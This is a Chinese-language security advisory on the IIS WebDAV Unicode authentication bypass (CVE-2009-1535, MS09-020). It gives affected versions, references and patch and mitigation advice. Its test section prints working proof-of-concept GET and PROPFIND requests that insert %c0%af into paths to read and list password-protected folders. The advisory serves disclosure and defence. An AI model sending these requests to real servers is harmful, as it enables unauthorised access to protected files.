发布日期：2009-05-15
更新日期：2009-06-10

受影响系统：

Microsoft IIS 6.0
Microsoft IIS 5.1

描述：

---

BUGTRAQ  ID: 34993
CVE(CAN) ID: CVE-2009-1535

Microsoft Internet信息服务（IIS）是Microsoft Windows自带的一个网络信息服务器，其中包含HTTP服务功能。

IIS的WebDAV功能在解析URI并发送回数据时没有正确地处理Unicode令牌环，远程攻击者可以通过提交恶意HTTP GET请求绕过受口令保护的文件夹的认证，或在受口令保护的WebDAV目录中列出、上传或下载文件。

<*来源：Kingcope （kingcope@gmx.net）
  
  链接：http://www.milw0rm.com/exploits/8704
        http://www.microsoft.com/technet/security/advisory/971492.mspx?pf=true
        http://secunia.com/advisories/35109/
        http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA09-160A.html
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com

GET /prot%c0%afected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: www.example.com


PROPFIND /protec%c0%afted/ HTTP/1.1
Host: www.example.com
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 在服务器上禁用WebDAV功能。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS09-020）以及相应补丁:
MS09-020：Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483)
链接：http://www.microsoft.com/technet/security/Bulletin/MS09-020.mspx?pf=true

浏览次数：5493
严重程度：0（网友投票）